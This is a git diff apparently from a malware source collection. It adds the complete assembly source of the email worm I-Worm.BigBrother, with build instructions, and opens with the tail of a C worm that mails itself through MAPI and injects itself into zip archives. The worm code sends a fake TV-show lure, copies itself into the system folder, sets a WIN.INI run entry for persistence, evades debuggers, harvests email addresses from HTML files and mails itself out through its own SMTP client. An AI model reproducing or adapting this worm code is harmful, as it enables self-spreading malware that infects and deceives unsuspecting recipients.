news send by our firm about security.\n" + "Please read by clicking on attached file.\n" + "\tBest Regards"; + mes->lpszMessageType=NULL; + mes->lpszDateReceived=NULL; + mes->lpszConversationID=NULL; + mes->flFlags=MAPI_SENT; + mes->lpOriginator->ulReserved=0; + mes->lpOriginator->ulRecipClass=MAPI_ORIG; + mes->lpOriginator->lpszName=mes->lpRecips->lpszName; + mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress; + mes->nRecipCount=1; + mes->lpRecips->ulReserved=0; + mes->lpRecips->ulRecipClass=MAPI_TO; + mes->lpRecips->lpszName=mname; + mes->lpRecips->lpszAddress=maddr; + mes->nFileCount=1; + mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc)); + memset(mes->lpFiles, 0, sizeof(MapiFileDesc)); + mes->lpFiles->ulReserved=0; + mes->lpFiles->flFlags=NULL; + mes->lpFiles->nPosition=-1; + mes->lpFiles->lpszPathName=filen; + mes->lpFiles->lpszFileName=attname; + mes->lpFiles->lpFileType=NULL; + mSendMail(session, NULL, mes, NULL, NULL); + } + }while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS); +free(mes->lpFiles); +mFreeBuffer(mes); +mLogoff(session,0,0,0); +FreeLibrary(hMAPI); +} + +*/ + +ExitProcess(0); +} + +void infzip(char *folder) +{ +register bool abc=TRUE; +register HANDLE fh; +if(strlen(folder)!=0) { +SetCurrentDirectory(folder); +fh=FindFirstFile("*.zip",&ffile); +if(fh!=INVALID_HANDLE_VALUE) { + while(abc) { + inzip[0]=0; + wsprintf(inzip,"%s -a -r %s %s",winzip,ffile.cFileName,copyn); + WinExec(inzip,1); + abc=FindNextFile(fh,&ffile); + } +} +} + +} diff --git a/Win32/I-Worm.BigBrother.asm b/Win32/I-Worm.BigBrother.asm new file mode 100644 index 00000000..6ec23576 --- /dev/null +++ b/Win32/I-Worm.BigBrother.asm @@ -0,0 +1,1555 @@ +;================================================================================================ +; :: +; #####################++++++++++++++++++ +; #:I-Worm.BigBrother # ! + +; ####################*################## +; + ! #:BioCoded by YuP # +; ++++++++++++++++++++################### +; :: +; +; +; +; +; [Disclaimer] +; ^~^~^~^~^~^~^ +; This file is a demonstration of WINASM coding. Educational purposes only! +; Author is not responsabile of any kind of damages which may occur after the +; asembly of this file. +; I TAKE NO RESPONSIBILITY FOR ANY ACTIONS WITH THIS CODE. +; +; [2002 CURRENT NOTES] +; This worm is so old that i don't remember when i have coded it, +; it is VERY VERY LAME! IT WAS CODED IN THIS TIMES WHEN I THOUHGT +; THAT WINASM = API CALL! AND YOU WILL SEE IT IN A SOURCE! +; SO IT IS GOOD FOR LAMMIEZ! +; +; Ad added 28.06.2002 - by Lord YuP / TKT - templars.org - tkt.planetsecurity.net +; [current greetz for all guyz from #virus and TKT memberz!] +; +; +; +; +; [Greetz] +; ^~^~^^~^ +; Big thx goez to: * Dageshi (#VXERS) - you helped me a lot ;>. +; * T-2000 / Immortal Riot (4 base encoder sample). +; +; Otherz (pozdrufka) to: detergent, blaze, b0sman, Exeq, Fidiasz , Duszek, Kwaz, +; tompaw69, PlayerPL, Grabarz (dragon bratha) +; Crash and otherz polish coderz. +; +; Bonus thx to: Dla Karolinki (z BB) -jestes tak glupia ,ze mi cie szkoda. +; (natchnienie) Ricky Martin ;P, Renegat, Rino Reinz, Ciuny, Palguma, +; Balon. +; +; Thx 4 payload txt to: Linkin Park (R) KeWl Music Group +; +; [How to Compile] +; ^~^~^~^~^~^~^~^ +; %: tasm32 /m1 /mx big.asm +; %: tlink32 /Tpe /aa big,big,,import32.lib +; %: brc32 big.res +; +; % NOTE. File is also compressed & encrypted by tElock tool ,ver.051 +; +; +; +; [Info] +; ^~^~^~ +; .:[SUPPORT.AVX.COM]: (my commentz in *[]*) +; +; +; +; Details: +;--------- +;Name : I-Worm.BigBrother +;Type: Internet Worm +;Aliases: none +;Size: 12800 bytes +; +;At the time of writing this we have only received one report of infection. +; +; +;Description: +;--------------- +;This is a virus which arrives in your e-mail in the following formatt: +; +;From: "BIGBROTHER TVN POLSKA" bigbrother@bigbrother.tvn.com.pl +;Subject: BIGBROTHER SHOW ! +; +;Body: Teraz mozesz ogladac BIGBROTHER SHOW za pomoca komputera! Jak to +;zrobic? Wystarczy ze uruchomisz specjalny program +;(BIGBROTHER_LIVE_CAMERA.EXE) , ktory zostal dolaczony do wiadomosci. +;Ponadto za pomoca tego narzedzia mozesz nominowac wybrane przez ciebie +;osoby, do opuszczenia domu Wielkiego Brata. Co miesiac rozlosowane beda +;nagrody (telewizory, wieze stereo, +;komputery ...i wiele ,wiele innych). Prosimy przysylac +;opinie i komentarze na temat programu. +; +; +;Zyczymy milej zabawy: +; +;Redakcja programu. +; +;Attachment: BigBrother_Live_Camera.exe +; +;When the user opens the attachment, the virus copies itself to C:\WINDOWS\SYSTEM with the name: ;b1g_brother.exe +;and adds the following line in WIN.INI: in the section [windows] +; +;run=c:\Windows\System\b1g_brother.exe +; +;After that it checks if the computer is connected to the Internet and then starts sending itself ;through e-mail in the format presented above. +; +;In order to get e-mail addresses it scans all hard drives for html files and it search inside ;them for the string mailto:, and it sends itself to those addresses. *[no in hd but in +;My Documents folder na Temp]* +; +;In case of running the b1g_brother.exe manually it shows the following message: +;SEGMENTATION FAULT. +;Please REPORT this BUG. +; + +;Payload: +;----------- +;On May 13 it displays the following message: + +;You like to think youre never wrong +;You want to act like youre someone +;You want someone to hurt like you +;You want to share what youve been through +;You live what you learn... +; +;Today you know the truth: i-worm.BigBrother +;Now contact with yourz AV expert. +;Future , Don't trust anyone ... +; [YuP/0ne Earth] +;payyes *[what?]* + +;Detection has been added. +; +; +; +; +; [Bugz] +; ^~^~^~ +; This i-worm should be able to work on win32 platformz without any erroz. Opps ;) it should be. +; On win98 (when i and dageshi were testing it) were some bugz (win98 fuck out). +; I don't know why ;) i don't have any time to check it with any debugER ;] +; do it yourself if you want of coz. This is my 1st i-worm and its very +; 'low-coded' i think ... The next onez should be better. +; +; +;================================================================================================ +; [L]etz [S]tart +; oO-= Have fun! =-Oo +;================================================================================================ + +.486p +locals +jumps +.model flat,STDCALL + +extrn ExitProcess:PROC ;i love it +extrn CopyFileA:PROC ;did i miss sth ? +extrn MessageBoxA:PROC +extrn SetFileAttributesA:PROC +extrn GetSystemDirectoryA:PROC +extrn lstrcatA:PROC +extrn lstrcpyA:PROC +extrn CreateFileA:PROC +extrn ExitWindowsEx:PROC +extrn Sleep:PROC +extrn CreateMutexA:PROC +extrn GetCurrentProcessId:PROC +extrn LoadLibraryA:PROC +extrn GetProcAddress:PROC +extrn PeekMessageA:PROC +extrn OpenMutexA:PROC +extrn RegOpenKeyExA:PROC +extrn RegQueryValueExA:PROC +extrn RegCloseKey:PROC +extrn FindFirstFileA:PROC +extrn FindNextFileA:PROC +extrn CreateFileA:PROC +extrn CloseHandle:PROC +extrn ReadFile:proc +extrn CharNextA:PROC +extrn lstrcpyn:PROC +extrn lstrlenA:PROC +extrn lstrcmp:PROC +extrn lstrcpy:PROC +extrn FindClose:PROC +extrn GetTopWindow:PROC +extrn GetNextWindowA:PROC +extrn PostMessageA:PROC +extrn GetActiveWindow:PROC +extrn GetTempPathA:PROC +extrn send:PROC +extrn recv:PROC +extrn WSAStartup:PROC +extrn WSACleanup:PROC +extrn socket:proc +extrn connect:PROC +extrn gethostbyname:PROC +extrn closesocket:PROC +extrn lstrlen:PROC +extrn WinExec:PROC +extrn lstrcmpi:PROC +extrn ReleaseMutex:PROC +extrn GetFileSize:PROC +extrn WriteFile:PROC +extrn GetModuleFileNameA:PROC +extrn GetCurrentDirectoryA:PROC +extrn _lread:PROC +extrn SetCurrentDirectoryA:PROC +extrn WriteProfileStringA:PROC +extrn RegCreateKeyA:PROC +extrn RegOpenKeyA:PROC + +;extrnz for payload +extrn SetTextColor:PROC +extrn GetDC:PROC +extrn TextOutA:PROC +extrn CreateFontA:PROC +extrn SelectObject:PROC +extrn LineTo:PROC +extrn GetSystemTime:PROC +extrn SetBkColor:PROC +extrn CreatePen:PROC + + + +.DATA + + +signature db "[I-WORM.BigBr0th3r] (c) YuP",0 + db "Greetz to all #PHREAKPL CREW",0 + db "and #VXERS TERRORIST GROUP.",0 + db "Special thx goez to: Dageshi",0 + db "& detergent ",0 + db "-=* GOOD WORK AV PEOPLE ;P *=-",0 + +myname db 256 dup(?) +new db '\b1g_brother.exe',0 +sysD db 256 dup(?) +sysDD db 256 dup(?) +tempD db 256 dup(?) +markerr db 'rundll32 kernel,FatalExit',0 +krnl db 'KERNEL32.DLL',0 +krnl_proc db 'RegisterServiceProcess',0 +mutex_name db 'Kakaroth',0 +mutexH dd ? +sys_name db 'b1g_brother.exe',0 + +module_filename db 256 dup(?) +dir db 1024 dup(?) +bslash db '\',0 + +;check connection +hang_connection db 'InternetHangUp',0 +check_connection db 'InternetGetConnectedState',0 +wininet_lib db 'WININET.DLL',0 +lpdwFlagz dd 0 + + +ini_key db 'run',0 +ini_sect db 'windows',0 + + + +;FOR REGISTRY +HKEY_LOCAL_MACHINE equ 80000001h +HKEY_CURRENT_USER equ 80000001h +hKeyPath db 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0 +hPersonal db 'Personal',0 +PersonalF db 128 dup(0) +PersonalFsize dd 128 +hKeyHandle dd 0 +my_key db 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\silent_thunder',0 +shit dd 0 +shitshit dd 0 + +server_p db 'Software\Microsoft\Internet Account Manager\Accounts\00000001',0 +server_h dd 0 +server_s db 'SMTP Server',0 +server db 128 dup(0) +server_size dd 128 + +;FOR SEARCH +fMASK db '\*.htm*',0 +fMASK1 db '*.htm*',0 +break db '\',0 +oldd dd 128 dup(0) +bus db 260 dup(0) ;search buffer ;] +fsH dd ? +fHnd dd ? +sciezka db 260 dup(0) + +WIN32_FIND_DATA struc +dwFileAttributes dd 0 +dwLowDateTime0 dd ? ; creation +dwHigDateTime0 dd ? +dwLowDateTime1 dd ? ; last access +dwHigDateTime1 dd ? +dwLowDateTime2 dd ? ; last write +dwHigDateTime2 dd ? +nFileSizeHigh dd ? +nFileSizeLow dd ? +dwReserved dd 0,0 +cFileName db 260 dup(0) +cAlternateFilename db 14 dup(0) + db 2 dup(0) +WIN32_FIND_DATA ends + +find_data WIN32_FIND_DATA + +;for e-mailz +mail db 'mailto:',0 +worm_size equ 10000h +worm_code db worm_size dup(0) +fH dd ? +searchH dd ? +counter equ 0 +longBuff dd ? +clear db '',0 +myB db 128 dup(?) +L1 db '"',0 +mail_string db 128 dup(0) +mail_good db 128 dup(0) +sep db '',0 + +;======================[BASE ENCODE DATA]=============================== +base_file db '00000b.rat',0 +base_file_name db 128 dup(0) +base_to_code db '000000s.b64',0 +base_to_code_buff db 128 dup(0) + +Encoding_Table: DB 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + DB 'abcdefghijklmnopqrstuvwxyz' + DB '0123456789+/' + +Input_Buffer DB 200 DUP(0) +Output_Buffer DB 200 DUP(0) + +base_buff_size equ 18516 +base_buffer DB base_buff_size DUP(0) +base_size dd 0 +baL dd ? + + + + +input_handle dd ? +Input_Handle dd ? +output_handle dd ? +Output_Handle dd ? + +IO_Bytes_Count DD 0 + +OPEN_EXISTING EQU 00000003h +CREATE_ALWAYS EQU 00000002h +FILE_ATTRIBUTE_NORMAL EQU 00000080h +GENERIC_READ EQU 80000000h +GENERIC_WRITE EQU 40000000h + +;============[E-MAIL CLIEN7]======================== +HELO db 'HELO bigbrother.r0x.pl',0dh,0ah + + +mime_code db 'From: "BIGBROTHER TVN POLSKA" ',0dh,0ah + db 'Subject: BIGBROTHER SHOW !',0dh,0ah + db 'MIME-Version: 1.0',0dh,0ah + db 'Content-Type: multipart/mixed; boundary="a1234"',0dh,0ah + db 0dh,0ah,'--a1234',0dh,0ah + db 'Content-Type: text/plain; charset=us-ascii',0dh,0ah + db 'Content-Transfer-Encoding: 7bit',0dh,0ah,0dh,0ah + db 0dh,0ah + db 'Teraz mozesz ogladac BIGBROTHER SHOW za pomoca komputera! Jak to',0dh,0ah + db 'zrobic? Wystarczy ze uruchomisz specjalny program',0dh,0ah + db '(BIGBROTHER_LIVE_CAMERA.EXE) , ktory zostal dolaczony do wiadomosci.',0dh,0ah + db 'Ponadto za pomoca tego narzedzia mozesz nominowac wybrane przez ciebie',0dh,0ah + db 'osoby, do opuszczenia domu Wielkiego Brata. Co miesiac rozlosowane beda',0dh,0ah + db 'nagrody (telewizory, wieze stereo,',0dh,0ah + db 'komputery ...i wiele ,wiele innych). Prosimy przysylac',0dh,0ah + db 'opinie i komentarze na temat programu.',0dh,0ah + db 0dh,0ah + db 0dh,0ah + db 'Zyczymy milej zabawy:',0dh,0ah + db 0dh,0ah + db 'Redakcja programu.',0dh,0ah + db '',0dh,0ah + db 0dh,0ah + db 0dh,0ah,'--a1234',0dh,0ah + db 'Content-Type: application/octet-stream; name="BigBrother_Live_Camera.exe"' + db 0dh,0ah,'Content-Transfer-Encoding: base64',0dh,0ah + db 'Content-Disposition: attachment; filename="BigBrother_Live_Camera.exe"',0dh,0ah,0dh,0ah + +mime_end db 0dh,0ah,'--a1234--',0dh,0ah,0dh,0ah,0 +mime_e equ mime_end + +dot db '.',0dh,0ah + +RCPT_1 db 'RCPT TO:<',0 +RCPT_ENDD db '>',0dh,0ah,0 + +RCPT db 160 dup (?) + + +MAIL_FROM db 'MAIL FROM:',0dh,0ah + +QUIT db 'QUIT',0dh,0ah +_DATA_ db 'DATA',0dh,0ah + +e_end db '',0 + + + +;==================================[END MAIL DATA]==================================== + +;==================================[WIN SOCKZ]======================================== + +addr struc +proto dw 2 +port dw 1900h +ip db 127,0,0,1 +addr ends + +addr2 addr <> + + +sock dd ? +SOCK_STREAM EQU 1 +AF_INET EQU 2 +WSA_Data DB 400 DUP(0) +SOCKET_ERR equ -1 +HOSTENT_IP equ 10h + +rB dd ? +;==================[END WIN SOCKZ]========================================= + +;============[END E-MAIL DATA]============================================= + +;FOR STEALTH +err_title db 'Setup',0 +markerror db 'Segmentation fault.',0dh,0ah,0dh,0ah + db 'Please REPORT this BUG.',0 + db 0dh,0ah,0 + + +;PAYLOAD + +;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++* +;===========[PAYL0AD ;))]================================================== +dcH dd ? +brH dd ? +fontH dd ? ;~^~^~^~^~^~^~^^~^~^~^~^ +info_line_1 db "You like to think youre never wrong",0 ;some lyrics from: +info_line_2 db "You want to act like youre someone",0 ;'POINTS OF AUTHORITY' - song +info_line_3 db "You want someone to hurt like you",0 ;of my best music group - +info_line_4 db "You want to share what youve been through",0 ;[L]inkin [P]ark ;)) +info_line_5 db "You live what you learn...",0 ;~^~^~^~^~^~^~^~^~^~^~^~^ + +info_line_6 db "Today you know the truth: i-worm.BigBrother",0 ;some txt from myself +info_line_7 db 'Now contact with yourz AV expert.',0 +info_line_8 db "Future , Don't trust anyone ... [YuP/0ne Earth]",0 + +sysTimeStruct db 16 dup(0) + +payday db 128 dup(0) +payyes db 'payyes',0 + +;===========[END PAY DATA]================================================= +;-------------------------------------------------------------------------* +;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++* +;-------------------------------------------------------------------------* +;===========[CODE SECTION]================================================= + +.CODE +Kakaroth: +push 256 +push offset module_filename +push 0 +call GetModuleFileNameA + +xor ebp,ebp +mov ebp,offset module_filename + +push offset dir +push 256 +call GetCurrentDirectoryA + +push offset bslash +push offset dir +call lstrcatA + +push offset dir +call lstrlen +mov edi,eax + +sub ecx,edi + +C_NEXT: +push ebp +call CharNextA +mov ebp,eax + +dec edi +jnz C_NEXT + +push ecx +push ebp +push offset myname +call lstrcpyn + +@DEBUG_CODE: +lea eax,dword ptr [esp-8h] +xor esi,esi +xchg eax,dword ptr fs:[esi] +lea edi,exception +push edi + + +push eax + +call @antidebug + +@antidebug: +add esp,4 +cmp esi,dword ptr fs:[esi+20h] +je @SKIP_DEBUG +jmp @HEART_STOPS + +@SKIP_DEBUG: +push 0 +push 0 +push 0 +push 0 +push 0 +call PeekMessageA + +@COPY_FILE: +push 256 +push offset sysD +call GetSystemDirectoryA + +xor eax,eax + +push offset new +push offset sysD +call lstrcatA +cmp eax,0 +jc @EXIT + +push 0 +push offset sysD +push offset myname +call CopyFileA +cmp eax,0 +jc @EXIT + +push 01h OR 02h +push offset sysD +call SetFileAttributesA + +push offset myname +push offset sys_name +call lstrcmpi +cmp eax,0 +jne @RUN_SYS_FILE + +@_CHECK_4_PAYLOAD: +push offset sysTimeStruct +call GetSystemTime +xor eax,eax +lea eax,sysTimeStruct +cmp word ptr [eax+2],5 ; 13th May +jne @SKIP_PAY +cmp word ptr [eax+6],13 +jne @SKIP_PAY + + +@PAY: ;payload +push 50000 ;sp00ky one ;)) +call Sleep ;wait some time + +push 0h +call GetDC +mov dword ptr [dcH],eax + +push 0 +push 1000h +push 1 +call CreatePen +mov dword ptr [brH],eax + +push dword ptr [brH] +push dword ptr [dcH] +call SelectObject + +push 500 +push 300 +push dword ptr [dcH] +call LineTo + +;=======[FONT]================================================= +push 0h +push 0h +push 0h +push 0h +push 0h +push 0h +push 0h +push 0h +push 0h +push 0 +push 0 +push 13 +push 23 +call CreateFontA +mov dword ptr [fontH],eax + + +push dword ptr [fontH] +push dword ptr [dcH] +call SelectObject + + + +push 0 +push dword ptr [dcH] +call SetBkColor + + +push 16777215 ;color - white +push dword ptr [dcH] +call SetTextColor + + +;======[END FONT]=========================================== + + +@TEXT: +push 16777215 +push dword ptr [dcH] +call SetTextColor + +mov esi,160 +mov edx,offset info_line_1 +mov ecx,140 +call @TEXT_OUT + +mov edx,offset info_line_2 +mov ecx,170 +call @TEXT_OUT + +mov edx,offset info_line_3 +mov ecx,200 +call @TEXT_OUT + +mov edx,offset info_line_4 +mov ecx,230 +call @TEXT_OUT + +mov edx,offset info_line_5 +mov ecx,260 +call @TEXT_OUT + +mov esi,160 +mov edx,offset info_line_6 +mov ecx,350 +call @TEXT_OUT + +mov esi,160 +mov edx,offset info_line_7 +mov ecx,380 +call @TEXT_OUT + +mov esi,160 +mov edx,offset info_line_8 +mov ecx,435 +call @TEXT_OUT + +push offset payyes +push offset payday +call lstrcatA + +call @SKIP_PAY + + +@TEXT_OUT: ;text-out function +push edx +call lstrlenA + +push eax +push edx +push ecx +push esi +push dword ptr [dcH] +call TextOutA + +ret + + +@SKIP_PAY: +@RESIDENT: +push offset mutex_name ;am i in memory now ? +push 0 +push 1 +call OpenMutexA +cmp eax,0 +jne @I_WAS_HERE +je @NEXT_ + +@I_WAS_HERE: +push 010h +push offset err_title +push offset markerror +push 0h +call MessageBoxA +push 0h +call ExitProcess + +@NEXT_: +push offset mutex_name ;nop then go there +push 1 +push 0 +call CreateMutexA +mov dword ptr [mutexH],eax + +xor edx,edx +xor eax,eax + +push offset krnl +call LoadLibraryA +cmp eax,0 +jc @EXIT +push offset krnl_proc +push eax +call GetProcAddress +or eax,eax +jz @PR +mov edx,eax + +call GetCurrentProcessId + +;push 1 +;push eax +;call edx + +@PR: +push offset sysD +push offset ini_key +push offset ini_sect +call WriteProfileStringA + + +call @GET_MAILZ_START + +@GET_MAILZ_START: +xor eax,eax +push offset hKeyHandle +push 0 +push 0 +push offset hKeyPath +push HKEY_LOCAL_MACHINE +call RegOpenKeyExA +cmp eax,0 +jne @EXIT + +push offset PersonalFsize +push offset PersonalF +push 0 +push 0 +push offset hPersonal +push hKeyHandle +call RegQueryValueExA + +push offset server_h +push 0 +push 0 +push offset server_p +push HKEY_CURRENT_USER +call RegOpenKeyExA +cmp eax,0 +jne @EXIT + +push offset server_size +push offset server +push 0 +push 0 +push offset server_s +push server_h +call RegQueryValueExA + +;PersonalF -> like My Docz + +push hKeyHandle +call RegCloseKey + + + + +push offset base_file_name +push 260 +call GetTempPathA + +push offset base_file +push offset base_file_name +call lstrcatA + + +;=======================[BASE ENCODER]========================== +;Thx goez to: * T-2000 / Immortal Riot (4 base encoder sample) + +; * dageshi (4 everything) + +;=============================================================== +@_BASE_ENCODER: + + +push offset base_to_code_buff ;copy source file +push 260 +call GetTempPathA + +push offset base_to_code +push offset base_to_code_buff +call lstrcatA + +push 1 +push offset base_to_code_buff +push offset sysD +call CopyFileA + + +;ble ble ble + + +XOR EBX, EBX + +PUSH EBX +PUSH FILE_ATTRIBUTE_NORMAL +PUSH OPEN_EXISTING +PUSH EBX +PUSH EBX +PUSH GENERIC_READ +PUSH OFFSET base_to_code_buff +CALL CreateFileA + +MOV [Input_Handle], EAX + +PUSH EBX +PUSH FILE_ATTRIBUTE_NORMAL +PUSH CREATE_ALWAYS +PUSH EBX +PUSH EBX +PUSH GENERIC_WRITE +push OFFSET base_file_name +CALL CreateFileA + +MOV [Output_Handle], EAX + +PUSH 0 ;wpiszem standard +PUSH OFFSET IO_Bytes_Count +PUSH (offset mime_end-offset mime_code) +push offset mime_code +PUSH [Output_Handle] +CALL WriteFile +cmp eax,0 +je @ERROR + +PUSH EBX ;size +PUSH [Input_Handle] +CALL GetFileSize + +CDQ +MOV ECX, (76/4)*3 +DIV ECX + +DEC EDX +JS No_Round + +INC EAX + +No_Round: +XCHG ECX, EAX + +Encode_Line: +PUSH ECX + +MOV ESI, OFFSET Input_Buffer + +PUSH 0 +PUSH OFFSET IO_Bytes_Count +PUSH (76/4)*3 +PUSH ESI +PUSH [Input_Handle] +CALL ReadFile + +MOV EDI, OFFSET Output_Buffer + +PUSH EDI + +PUSH 76/4 +POP ECX + +Encode_Packet: +PUSH ECX + +MOV CL, 8 + +LODSB +SHL EAX, CL + +LODSB +SHL EAX, CL + +LODSB +SHL EAX, CL + +MOV EBX, OFFSET Encoding_Table + +MOV CL, 4 + +Encode_Byte: +SHR EAX, 2 + +ROL EAX, 8 + +XLAT +STOSB + +LOOP Encode_Byte + +POP ECX + +LOOP Encode_Packet + +MOV WORD PTR [EDI], 0A0Dh ; . + +POP EAX + +PUSH 0 +PUSH OFFSET IO_Bytes_Count +PUSH 78 +PUSH EAX +PUSH [Output_Handle] +CALL WriteFile + +POP ECX + +LOOP Encode_Line + +push [Output_Handle] +call CloseHandle + + +;=====================================================[END BASE ENCODER]=========== + +;=====================================================[GET BASE CODE TO BUFF]====== + +@GET_BASE_CODE: +push 00000000h +push 00000080h +push 00000003h +push 00000000h +push 00000001h +push 80000000h +push offset base_file_name +call CreateFileA +mov edi,eax + + +push 0 +push edi +call GetFileSize + + +push 0 +push offset baL +push eax +push offset base_buffer +push edi +call ReadFile + +;=====================================================[END GETTING]=============== +@NEXT__: +push offset shitshit +push offset my_key +push HKEY_LOCAL_MACHINE +call RegOpenKeyA +cmp eax,0 +je @EXIT + +push offset shit +push offset my_key +push HKEY_LOCAL_MACHINE +call RegCreateKeyA + +mov bh,0 +mov bl,0 +CALL @SCAN_MYDOCZ + +@SCAN_TEMP: +push offset tempD +push 260 +call GetTempPathA + +push offset clear +push offset bus +call lstrcpyA + +push offset tempD +push offset bus +call lstrcpyA + +push offset fMASK1 ;add +push offset bus +call lstrcatA + + +call @FIND_1st +call @GO_GO1 + +@SCAN_MYDOCZ: +xor edi,edi + +push offset clear +push offset bus +call lstrcpyA + +push offset PersonalF +push offset bus +call lstrcpyA + +push offset fMASK ;add +push offset bus +call lstrcatA + +call @FIND_1st +call @GO_GO + +@FIND_1st: + +push offset find_data +push offset bus +call FindFirstFileA +mov dword ptr [searchH],eax +cmp eax,-1 +je @ERROR + +ret + +@CLEAR_PATH: +push offset clear +push offset sciezka +call lstrcpyA +ret + +@GO_GO: +call @CLEAR_PATH +xor edi,edi +push offset PersonalF +push offset sciezka +call lstrcatA +push offset break +push offset sciezka +call lstrcatA +push offset find_data.cFileName +push offset sciezka +call lstrcatA +xor edi,edi +mov edi,offset sciezka +call @SCAN_HTM_FILE_STEP1 + +@GO_GO1: +call @CLEAR_PATH +xor edi,edi +push offset tempD +push offset sciezka +call lstrcatA +push offset break +push offset sciezka +call lstrcatA +push offset find_data.cFileName +push offset sciezka +call lstrcatA +xor edi,edi +mov edi,offset sciezka +call @SCAN_HTM_FILE_STEP1 + + + +@SCAN_HTM_FILE_STEP1: + +push 00000000h +push 00000080h +push 00000003h +push 00000000h +push 00000001h +push 80000000h +push edi +call CreateFileA +cmp eax,-1 +je @ERROR_M + +mov dword ptr [fH],eax + + +push 0h +push offset longBuff +push worm_size ;size +push offset worm_code +push dword ptr [fH] +call ReadFile +cmp eax,0 +je @ERROR_M + +call @CLEAR + +@MARK: +xor esi,esi +mov esi,0 +xor ebp,ebp +mov ebp,offset worm_code +xor edi,edi +mov edi,1 + +@ALGORITM: +xor edi,edi +mov edi,1 +call LOOPING_JOE + +push offset L1 +push offset myB +call lstrcmp +cmp eax,0 +je @CH + +inc esi +cmp esi,10000 +ja @END_OF_FILE +call @ALGORITM + +@CH: +call @CLEAR +call @CHECK_STRING + +LOOPING_JOE: +push ebp +call CharNextA +mov ebp,eax + +push 2 +push ebp +push offset myB +call lstrcpyn + +ret + + +@CHECK_STRING: +call LOOPING_JOE + +push offset myB +push offset mail_string +call lstrcatA + +inc esi +inc edi +cmp edi,8 +jne @CHECK_STRING +je @IS_IT_GOD + +@IS_IT_GOD: +push offset mail +push offset mail_string +call lstrcmp +cmp eax,0 +je @GET_MAIL +jne @ALGORITM + + +@GET_MAIL: +call LOOPING_JOE + +push offset L1 +push offset myB +call lstrcmp +cmp eax,0 +je @END_MAIL + +push offset myB +push offset mail_good +call lstrcatA + +inc esi +cmp esi,1000 +jne @GET_MAIL + +@END_MAIL: ;TU GEN MAIL + +inc bl +cmp bl,10 +ja @ERROR + +call @SEND_MAIL + +@NEXT_MAILL: +xor edi,edi +mov edi,1 + +call @ALGORITM + +@END_OF_FILE: +push dword ptr [fH] +call CloseHandle + +xor eax,eax +xor ebp,ebp +call @CLEAR +call @CLEAR_BUFF +call @FIND_NEXT_FILE + +@CLEAR: +push offset sep +push offset mail_good +call lstrcpy +push offset sep +push offset mail_string +call lstrcpy +ret + +@CLEAR_BUFF: +push offset sep +push offset worm_code +call lstrcpy +ret + +exception: +xor esi,esi +mov eax,dword ptr fs:[esi] +mov esp,dword ptr [eax] + +@FIND_NEXT_FILE: + +push offset find_data +push dword ptr [searchH] +call FindNextFileA +cmp eax,0 +je @ERROR_NO_FILEZ_LEFT + +cmp bh,1 +ja @GO_TO_GO1 +call @GO_GO + +@GO_TO_GO1: +call @GO_GO1 + +@ERROR: + +push dword ptr [fHnd] +call CloseHandle + +call @EXIT + +@ERROR_M: +push dword ptr [searchH] +call FindClose +call @EXIT + + +@ERROR_NO_FILEZ_LEFT: +cmp bh,2 +je @ERROR_M +ja @ERROR_M +add bh,2 +push dword ptr [searchH] +call FindClose +call @SCAN_TEMP + + +@SEND_MAIL: +push offset RCPT_1 +push offset RCPT +call lstrcatA + +push offset mail_good +push offset RCPT +call lstrcatA + +push offset RCPT_ENDD +push offset RCPT +call lstrcatA + +;======[CHECK INTERNET STATE]======= +;WININET.DLL REQUIRED :> + +;=================================== +@CHECK_CONN: +push 500 ;little stealth +call Sleep + +push offset wininet_lib +call LoadLibraryA + +push offset check_connection +push eax +call GetProcAddress +xchg eax,ecx +jecxz @INIT_W + +;push 0 +;push offset lpdwFlagz +;call ecx +;or eax,eax +;jz @CHECK_CONN + + +;======[INIT WINSOCK]================ +@INIT_W: +push offset WSA_Data +PUSH 0101h +CALL WSAStartup +cmp eax,0 +jne @EXIT + +push 0 +push SOCK_STREAM +push AF_INET +call socket +cmp eax,SOCKET_ERR +je @CLEAN +mov sock,eax + +;======[CONNECT]===================== + +;push offset server +;call gethostbyname +;cmp eax,0 +;je @CLEAN + + +;mov eax,dword ptr [eax+HOSTENT_IP] +;mov eax,dword ptr [eax] +;mov dword ptr [addr2.ip],eax + + +push 16 +push offset addr2 +push sock +call connect +cmp ax,SOCKET_ERR +je @CLEAN + +;======[READ AND SEND LOOP]========== + +push 20 +call Sleep +push 0 +push 512 +push offset rB +push sock +call recv + +push 0 +push 24 +push offset HELO +push sock +call send + +push 20 +call Sleep +push 0 +push 512 +push offset rB +push sock +call recv + +push 0 +push 31 +push offset MAIL_FROM +push sock +call send + +push 20 +call Sleep +push 0 +push 512 +push offset rB +push sock +call recv + +push offset RCPT +call lstrlen + +push 0 +push eax +push offset RCPT +push sock +call send + +push 20 +call Sleep +push 0 +push 512 +push offset rB +push sock +call recv + +push 0 +push 6 +push offset _DATA_ +push sock +call send + +push 20 +call Sleep +push 0 +push 512 +push offset rB +push sock +call recv + +push offset base_buffer +call lstrlen + +push 0 +push eax +push offset base_buffer +push sock +call send + + +push 0 +push 3 +push offset dot +push sock +call send + +push 20 +call Sleep +push 0 +push 512 +push offset rB +push sock +call recv + +push 0 +push 6 +push offset QUIT +push sock +call send + +push sock +call closesocket + +call WSACleanup + +push offset sep +push offset RCPT +call lstrcpy + +push 5000 +call Sleep + +call @NEXT_MAILL + +@EX: + +push sock +call closesocket +push 0h +call ExitProcess + +@CLEAN: +call WSACleanup +push 0h +call @EXIT + + + +@EXIT: +push offset payday +push offset payyes +call lstrcmp +cmp eax,0 +je @HANG_ALL_CONNECTIoNZ +jne _STAY_IN_MEM + + +_STAY_IN_MEM: +push 50000 +call Sleep +call _STAY_IN_MEM + +@BUFFER_OVERFLOW: +call GetActiveWindow ;zabijamy aktywne okno przypuszczalnie debugger +mov edx,eax ;nieskonczona petla powoduje blad w kernelu +push 0 ;plik robaka bedzie dostepny po resecie systemu ;)) +push 0 +push 12h +push edx +call PostMessageA +CALL @BUFFER_OVERFLOW + +@HEART_STOPS: +push 1 +push offset markerr +call WinExec + +push 100 +call Sleep + +call @BUFFER_OVERFLOW + +@RUN_SYS_FILE: +push 256 